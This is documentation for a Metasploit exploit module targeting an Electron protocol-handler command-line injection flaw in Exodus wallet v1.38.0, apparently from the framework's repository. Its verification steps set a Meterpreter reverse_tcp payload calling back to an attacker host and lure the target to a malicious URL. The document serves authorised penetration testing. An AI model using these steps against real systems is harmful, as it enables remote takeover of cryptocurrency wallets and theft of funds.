Path: blob/master/documentation/modules/exploit/windows/browser/exodus.md
## Description
This module exploits an Electron remote code execution vulnerability in Exodus wallet. The vulnerability is in Electron's protocol handler, which makes it possible to inject command-line arguments via the URI handler. This module has been tested successfully on Windows 10 Enterprise x64. The vulnerable application is available for download at Exodus v1.38.0.
## Verification Steps

1. Install Exodus Wallet version `v1.38.0`
2. Start `msfconsole`
3. Do `use exploit/windows/browser/exodus`
4. Do `set PAYLOAD windows/meterpreter/reverse_tcp`
5. Do `set LHOST ip`
6. Do `exploit`
7. On the target machine, browse to the malicious URL and launch Exodus
8. Verify the Meterpreter session is opened